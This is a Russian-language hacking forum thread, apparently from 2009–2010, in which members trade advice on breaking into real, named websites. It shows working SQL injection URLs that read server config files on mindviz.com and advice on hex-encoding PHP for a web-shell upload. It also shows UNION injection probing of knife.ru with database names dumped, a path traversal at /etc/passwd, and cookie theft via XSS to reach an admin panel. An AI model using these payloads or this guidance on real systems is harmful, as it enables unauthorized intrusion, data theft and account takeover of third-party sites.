Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Есть логин и пароль и именя баз данных но немогу найти phpMyAdmin!!! Подскажите хорошую прогу для удаленного редактирования...
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    GOGA075 http://scan.xaknet.ru:8080/action/scan

    и не факт что есть phpmyadmin
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2papst ищи в конфигах пути /etc/httpd/conf/httpd.conf например
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    правильный или нет путь проверяется путем попытки прочитать какую-то страницу сайта:
    Code:
    http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/home/sites/mindviz/httpd/gift.php'),8,9,10,11,12,13,14,15,16,17--+
    
    Путь взят отсюда:
    Code:
    http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,load_file('/usr/local/apache/conf/httpd.conf'),8,9,10,11,12,13,14,15,16,17--+
    
    DocumentRoot /home/sites/mindviz/httpd <------

    Чтобы залить шелл, надо найти папку, доступную на запись, php-код лучше хексить, а не писать в чистом виде
     
    1 person likes this.
  5. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    есть шанс порутить ядро Fri Dec 4 08:40:11 EET 2009 ?!
    этот сплоент был до обновы ядра выпущен :mad:
     
  6. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1 - вот вроде sql inj выводит ошибку
    PHP:
    Ошибка запроса'select name,parentid from kn_tree where id=1 union all select 1'
    а если запрос изменить на:
    http://www.knife.ru/index.php?1=1&do=list&treeid=1+union+all+select+1,2
    то ошибка уже
    PHP:
     Ошибка запроса'select typeid from kn_tree where id=1 union all select 1,2'
    что это значит? и как подобрать количество полей.?
    кстати вот ещё http://www.knife.ru/index.php?1=1&do=list&treeid=1+order+by+1 терь ошибка вообще другая...
     
  7. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Подскажите хороший perl интерпретатор для сплоита.
     
    #12327 GOGA075, 12 Apr 2010
    Last edited: 12 Apr 2010
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Gorev, благодарю!
     
  10. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292

    Version:
    5.5.2-m2-log
    Database: information_schema / knife / knife_forum / knife_phpbb2
    Installation dir: /usr/local/
    User: knife@localhost
    слепая
    з.ы щяс порыскаю может ище чтото найду
     
    #12330 Дирижабль, 13 Apr 2010
    Last edited: 13 Apr 2010
    1 person likes this.
  11. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Как определить какая СУБД?
    вылазит такая ошибка
    Вывода добиться не получилось
    select top 1 * from dbo_OnlcPages where url_path_en in ('tenders/','tenders/c0/','tenders/c0/'--+a/') or url_path in ('tenders/','tenders/c0/','tenders/c0/'--+a/') order by url_path_en desc
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    MSSQL вроде
     
    1 person likes this.
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Залил шел, а там только белая страница, в чом проблема может быть??
     
  14. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Вообщем возник такой вопрос... возможно ли абсолютно точно определить версию joomla 1.5 ?
    Code:
      <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
    Это то понятно... а именно какая можно пробить ?
     
  15. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    no way man !
     
  16. M@iL

    M@iL New Member

    Joined:
    26 Dec 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    нашёл хсс активную на одном интересном для меня сайте, но возникла проблема с кражей куков..
    Приходят все строки в куках но bbpassword=hash не приходит..
    в опере смотрю у себя куки, есть bbpassword=hash а смотрю в логах сниффера нет такова.. это какая то защита от кражи куков или я что то не так делаю ? как быть, что с хсс делать ? как в админку попасть)
     
  17. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    мы не экстрасенсы скинь сайт
     
  18. M@iL

    M@iL New Member

    Joined:
    26 Dec 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Сайт где именно не буду говорить ) просто может кто встречался с этим случием и знает что делать.. у меня такое не с одним сайтом вообще встречалось.. как так, в опере есть кук с хешем: bbpassword а сниффер не ловит его.. как быть..
     
    #12338 M@iL, 14 Apr 2010
    Last edited: 14 Apr 2010
  19. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    что делать если такая ошибка
    Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59

    адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
    site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
     
  20. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    https://forum.antichat.ru/thread98525.html
     
    2 people like this.
Thread Status:
Not open for further replies.